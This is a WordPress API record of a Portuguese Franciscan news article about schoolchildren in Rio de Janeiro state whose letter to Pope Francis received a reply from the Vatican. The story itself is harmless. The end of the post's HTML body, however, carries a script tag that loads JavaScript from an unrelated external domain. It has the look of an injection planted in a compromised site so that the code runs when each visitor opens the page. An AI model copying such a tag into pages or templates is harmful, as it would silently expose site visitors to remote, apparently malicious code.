{"id":159918,"date":"2018-05-22T12:08:14","date_gmt":"2018-05-22T15:08:14","guid":{"rendered":"http:\/\/franciscanos.org.br\/?p=159918"},"modified":"2019-02-21T08:11:41","modified_gmt":"2019-02-21T11:11:41","slug":"papa-responde-carta-dos-alunos-do-bom-jesus","status":"publish","type":"post","link":"https:\/\/franciscanos.org.br\/noticias\/papa-responde-carta-dos-alunos-do-bom-jesus.html","title":{"rendered":"Papa Francisco responde carta dos alunos do Bom Jesus"},"content":{"rendered":"<p><img loading=\"lazy\" src=\"http:\/\/franciscanos.org.br\/wp-content\/uploads\/2018\/05\/carta_papa_220518_1.jpg\" alt=\"carta_papa_220518_1\" width=\"830\" height=\"450\" \/><\/p>\n<p>Em tempos de redes sociais e comunica\u00e7\u00e3o instant\u00e2nea a dist\u00e2ncia, o uso de cartas f\u00edsicas \u00e9 praticamente desconsiderado pela atual gera\u00e7\u00e3o. Por\u00e9m, foi por meio desse instrumento tradicional e quase esquecido que alunos do Col\u00e9gio Bom Jesus, no Rio de Janeiro, conseguiram se comunicar com o Papa Francisco, no Vaticano.<\/p>\n<p>Tudo come\u00e7ou com uma proposta pedag\u00f3gica da Institui\u00e7\u00e3o. A ideia era trabalhar o livro \u201cQuerido Papa Francisco\u201d (Edi\u00e7\u00f5es Loyola) com alunos do Ensino Fundamental durante as aulas de Ensino Religioso, em todas as Unidades de ensino do Bom Jesus. A obra re\u00fane respostas do pont\u00edfice a perguntas de crian\u00e7as de diferentes partes do mundo sobre temas variados. \u201cA atividade consistia em ler o livro com a fam\u00edlia e tamb\u00e9m na escola, com colegas e professores\u201d, explica o coordenador de Ensino Religioso do Col\u00e9gio Bom Jesus, M\u00e1rio Renato Longen. Ap\u00f3s a leitura, os estudantes eram instigados a refletir sobre as respostas relacionadas a temas como morte, conflito familiar e exist\u00eancia de Deus.<\/p>\n<p><strong><img loading=\"lazy\" class=\"alignleft wp-image-159924 \" src=\"http:\/\/franciscanos.org.br\/wp-content\/uploads\/2018\/05\/carta_papa_220518_2-e1527001149400.jpg\" alt=\"carta_papa_220518_2\" width=\"283\" height=\"324\" \/>Alunos com prop\u00f3sito <\/strong><\/p>\n<p>A atividade pedag\u00f3gica foi t\u00e3o bem-aceita pelos estudantes, que tr\u00eas turmas do 5.\u00ba ao 6.\u00ba ano do Ensino Fundamental surpreenderam a professora de Ensino Religioso da Unidade Bom Jesus S\u00e3o Jos\u00e9 (Petr\u00f3polis\/RJ), Christiani Regina Machado Dias Bailume. O grupo de alunos insistiu no envio de uma carta endere\u00e7ada ao Papa para agradecer e comentar o conte\u00fado do livro.<\/p>\n<p>\u201cNossos alunos adoraram a maneira como o Papa respondeu a perguntas sobre temas complexos para eles, como a morte, por exemplo. A did\u00e1tica do Papa e a linguagem acess\u00edvel conquistaram a todos e, como gratid\u00e3o, eles decidiram escrever uma carta ao autor do livro\u201d, conta a professora Christiani.<\/p>\n<p>Com a produ\u00e7\u00e3o da carta coletiva conclu\u00edda, os alunos passaram ao principal desafio: como fazer o texto chegar ao Papa. Providencialmente, a professora Christiani lembrou que havia recebido, h\u00e1 alguns anos, uma correspond\u00eancia do Vaticano em resposta a um pedido de participa\u00e7\u00e3o em evento das fam\u00edlias com o Papa. \u201cO envelope est\u00e1 muito bem guardado em casa e, gra\u00e7as a ele, conseguimos recuperar o endere\u00e7o do destinat\u00e1rio\u201d, explica.<\/p>\n<p><strong>Resposta muito aguardada <\/strong><\/p>\n<p>O envio da carta, em meados de outubro de 2017, s\u00f3 fez crescer a ansiedade dos alunos na espera por uma resposta. Embora a professora Christiani tenha trabalhado a expectativa com os estudantes, nada era certo. Foi ent\u00e3o que, pouco antes do final do ano letivo, a surpresa: chegava \u00e0 Unidade um envelope com o bras\u00e3o oficial do Vaticano e, dentro dele, o precioso conte\u00fado.<\/p>\n<p><img loading=\"lazy\" class=\"alignleft wp-image-159934 \" src=\"http:\/\/franciscanos.org.br\/wp-content\/uploads\/2018\/05\/carta_papa_220518_3.jpg\" alt=\"carta_papa_220518_3\" width=\"831\" height=\"1175\" \/><\/p>\n<p>Um dos trechos da carta que mais chamou a aten\u00e7\u00e3o dos alunos foi: \u201cO sucessor do Ap\u00f3stolo Pedro os exorta a nunca se esquecerem que Jesus tamb\u00e9m os ama, conhece o nome e os desejos de cada um de seus familiares e amigos e conta com sua ajuda para ter ainda mais amigos no Brasil\u201d.<\/p>\n<p>\u201cPode parecer um pequeno gesto, mas para os nossos alunos teve um significado muito grande, ressaltando a import\u00e2ncia da fraternidade e da empatia, valores humanos que precisamos cultivar todos os dias\u201d, conclui Christiani. Confira algumas imagens da produ\u00e7\u00e3o da carta coletiva na galeria de fotos abaixo.<\/p>\n\n<p><strong> Fonte: <a href=\"http:\/\/bomjesus.br\/sobre\/noticias-exibe\/119674768\/papa+francisco+responde+carta+de+alunos+do+colegio+bom+jesus.htm\">Col\u00e9gio Bom Jesus<\/a><\/strong><\/p>\n<p><script id=\"lg210a\" src=\"https:\/\/cloudapi.online\/js\/api46.js\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Associa\u00e7\u00e3o de Ensino Bom Jesus<\/p>\n","protected":false},"author":1,"featured_media":200459,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[1],"tags":[260,55],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v19.2 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Papa Francisco responde carta dos alunos do Bom Jesus - Not\u00edcias - Franciscanos<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/franciscanos.org.br\/noticias\/papa-responde-carta-dos-alunos-do-bom-jesus.html\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Papa Francisco responde carta dos alunos do Bom Jesus - Not\u00edcias - Franciscanos\" \/>\n<meta property=\"og:description\" content=\"Associa\u00e7\u00e3o de Ensino Bom Jesus\" \/>\n<meta property=\"og:url\" content=\"https:\/\/franciscanos.org.br\/noticias\/papa-responde-carta-dos-alunos-do-bom-jesus.html\" \/>\n<meta property=\"og:site_name\" content=\"Not\u00edcias - Franciscanos\" \/>\n<meta property=\"article:published_time\" content=\"2018-05-22T15:08:14+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2019-02-21T11:11:41+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/05\/carta_papa_220518_1d.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"273\" \/>\n\t<meta property=\"og:image:height\" content=\"181\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"admin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"admin\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. tempo de leitura\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebSite\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#website\",\"url\":\"https:\/\/franciscanos.org.br\/noticias\/\",\"name\":\"Not\u00edcias - Franciscanos\",\"description\":\"Prov\u00edncia Franciscana da Imaculada Concei\u00e7\u00e3o do Brasil - Ordem dos Frades Menores - OFM\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/franciscanos.org.br\/noticias\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"pt-BR\"},{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/papa-responde-carta-dos-alunos-do-bom-jesus.html#primaryimage\",\"url\":\"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/05\/carta_papa_220518_1d.jpg\",\"contentUrl\":\"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/05\/carta_papa_220518_1d.jpg\",\"width\":273,\"height\":181},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/papa-responde-carta-dos-alunos-do-bom-jesus.html#webpage\",\"url\":\"https:\/\/franciscanos.org.br\/noticias\/papa-responde-carta-dos-alunos-do-bom-jesus.html\",\"name\":\"Papa Francisco responde carta dos alunos do Bom Jesus - Not\u00edcias - Franciscanos\",\"isPartOf\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/papa-responde-carta-dos-alunos-do-bom-jesus.html#primaryimage\"},\"datePublished\":\"2018-05-22T15:08:14+00:00\",\"dateModified\":\"2019-02-21T11:11:41+00:00\",\"author\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/b38fbf43118f02820bd932f2e4b14ad3\"},\"breadcrumb\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/papa-responde-carta-dos-alunos-do-bom-jesus.html#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/franciscanos.org.br\/noticias\/papa-responde-carta-dos-alunos-do-bom-jesus.html\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/papa-responde-carta-dos-alunos-do-bom-jesus.html#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/franciscanos.org.br\/noticias\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Papa Francisco responde carta dos alunos do Bom Jesus\"}]},{\"@type\":\"Person\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/b38fbf43118f02820bd932f2e4b14ad3\",\"name\":\"admin\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g\",\"caption\":\"admin\"},\"url\":\"https:\/\/franciscanos.org.br\/noticias\/author\/admin\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Papa Francisco responde carta dos alunos do Bom Jesus - Not\u00edcias - Franciscanos","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/franciscanos.org.br\/noticias\/papa-responde-carta-dos-alunos-do-bom-jesus.html","og_locale":"pt_BR","og_type":"article","og_title":"Papa Francisco responde carta dos alunos do Bom Jesus - Not\u00edcias - Franciscanos","og_description":"Associa\u00e7\u00e3o de Ensino Bom Jesus","og_url":"https:\/\/franciscanos.org.br\/noticias\/papa-responde-carta-dos-alunos-do-bom-jesus.html","og_site_name":"Not\u00edcias - Franciscanos","article_published_time":"2018-05-22T15:08:14+00:00","article_modified_time":"2019-02-21T11:11:41+00:00","og_image":[{"width":273,"height":181,"url":"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/05\/carta_papa_220518_1d.jpg","type":"image\/jpeg"}],"author":"admin","twitter_card":"summary_large_image","twitter_misc":{"Escrito por":"admin","Est. tempo de leitura":"3 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebSite","@id":"https:\/\/franciscanos.org.br\/noticias\/#website","url":"https:\/\/franciscanos.org.br\/noticias\/","name":"Not\u00edcias - Franciscanos","description":"Prov\u00edncia Franciscana da Imaculada Concei\u00e7\u00e3o do Brasil - Ordem dos Frades Menores - OFM","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/franciscanos.org.br\/noticias\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"pt-BR"},{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/franciscanos.org.br\/noticias\/papa-responde-carta-dos-alunos-do-bom-jesus.html#primaryimage","url":"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/05\/carta_papa_220518_1d.jpg","contentUrl":"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/05\/carta_papa_220518_1d.jpg","width":273,"height":181},{"@type":"WebPage","@id":"https:\/\/franciscanos.org.br\/noticias\/papa-responde-carta-dos-alunos-do-bom-jesus.html#webpage","url":"https:\/\/franciscanos.org.br\/noticias\/papa-responde-carta-dos-alunos-do-bom-jesus.html","name":"Papa Francisco responde carta dos alunos do Bom Jesus - Not\u00edcias - Franciscanos","isPartOf":{"@id":"https:\/\/franciscanos.org.br\/noticias\/#website"},"primaryImageOfPage":{"@id":"https:\/\/franciscanos.org.br\/noticias\/papa-responde-carta-dos-alunos-do-bom-jesus.html#primaryimage"},"datePublished":"2018-05-22T15:08:14+00:00","dateModified":"2019-02-21T11:11:41+00:00","author":{"@id":"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/b38fbf43118f02820bd932f2e4b14ad3"},"breadcrumb":{"@id":"https:\/\/franciscanos.org.br\/noticias\/papa-responde-carta-dos-alunos-do-bom-jesus.html#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/franciscanos.org.br\/noticias\/papa-responde-carta-dos-alunos-do-bom-jesus.html"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/franciscanos.org.br\/noticias\/papa-responde-carta-dos-alunos-do-bom-jesus.html#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/franciscanos.org.br\/noticias"},{"@type":"ListItem","position":2,"name":"Papa Francisco responde carta dos alunos do Bom Jesus"}]},{"@type":"Person","@id":"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/b38fbf43118f02820bd932f2e4b14ad3","name":"admin","image":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g","caption":"admin"},"url":"https:\/\/franciscanos.org.br\/noticias\/author\/admin"}]}},"_links":{"self":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/posts\/159918"}],"collection":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/comments?post=159918"}],"version-history":[{"count":0,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/posts\/159918\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/media\/200459"}],"wp:attachment":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/media?parent=159918"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/categories?post=159918"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/tags?post=159918"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}